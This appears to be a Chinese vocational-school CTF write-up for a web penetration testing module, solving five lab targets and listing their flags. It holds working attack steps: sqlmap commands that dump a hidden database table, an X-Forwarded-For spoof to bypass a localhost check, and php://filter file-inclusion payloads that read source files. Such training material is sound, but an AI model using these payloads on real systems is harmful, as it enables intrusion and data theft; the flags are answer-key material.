网络安全(中职组)-B模块:Web安全渗透测试
Web安全渗透测试
任务环境说明:
服务器场景:PYsystem003(关闭链接)
服务器操作系统:未知
用户名:未知 密码:未知
1. 通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;
连续按F12就能查源码
flag{fc35fdc70d5fc69d269883a822c7a53e}
2. 通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;
传参id=1可见是一个sql注入,直接sqlmap跑就行
sqlmap -u "url" --current-db #--current-db参数获取当前正在使用的数据库
跑出来是mysql库
sqlmap -u "url" -tables -D mysql #获取库中表
其中有一个comehere!!!表
sqlmap -u "url" -columns -T "comehere\!\!\!" -D mysql #获取字段,表名这里要使用转义字符才能正常使用
跑出来只有一个字段F1Ag
sqlmap -u "http://172.16.102.247/2/aa.php?id=1" --dump -C F1Ag -T "comehere\!\!\!" -D "mysql" #获取字段下的信息
f14g{187ef4436122d1cc2f40dc2b92f0eba0}
3. 通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;
禁止爬虫就是rebots.txt文件,直接访问
文件中包含flag文件,直接访问flag文件就行
flag{8c7dd922ad47494fc02c388e12c00eac}
4. 通过浏览器访问http://靶机服务器IP/4,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;
本地访问可以看出是XFF伪造
BP抓包之后,改一下包就行
插入一行
X-Forwarded-For:127.0.0.1
flag{c71b47723409ac75d3e6b28f78b372ce}
5. 通过浏览器访问http://靶机服务器IP/5,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交。
从file可以看出是一个文件包含
尝试base64加密访问一下主页
file=php://filter/read=convert.base64-encode/resource=index.php
base64解密一下文本
file=php://filter/read=convert.base64-encode/resource=flag.php
同样base64解码
flag{098f6bcd4621d373cade4e832627b4f6}
最新文章
- R语言-数据高级管理
- vs2013外接程序”VMDebugger”加载异常处理
- mybatis动态SQL - like
- 利用Gson和SharePreference存储结构化数据
- mysql 截取字符
- 认识JavaScript的原型
- wxpython 布局管理
- 转:js包装DOM对象
- 第三题 有如下Student 对象,  private String name;       private int age;       private int score;   private String classNum;  其中,classNum&
- Python可视化库Matplotlib的使用
- Java高并发秒杀系统API之SSM框架集成swagger与AdminLTE
- SDN第四次作业
- web报表工具FineReport的公式编辑框的语法简介
- HTML(二)HTML元素(整体结构,块级元素,内联元素,结构元素,交互元素,元素嵌套规则)
- 使用css设置三角形
- 《机器学习实战(基于scikit-learn和TensorFlow)》第六章内容学习心得
- TextField
- 什么是车辆识别代码(VIN)
- DNS解析全过程分析
- ASP.NET MVC验证码演示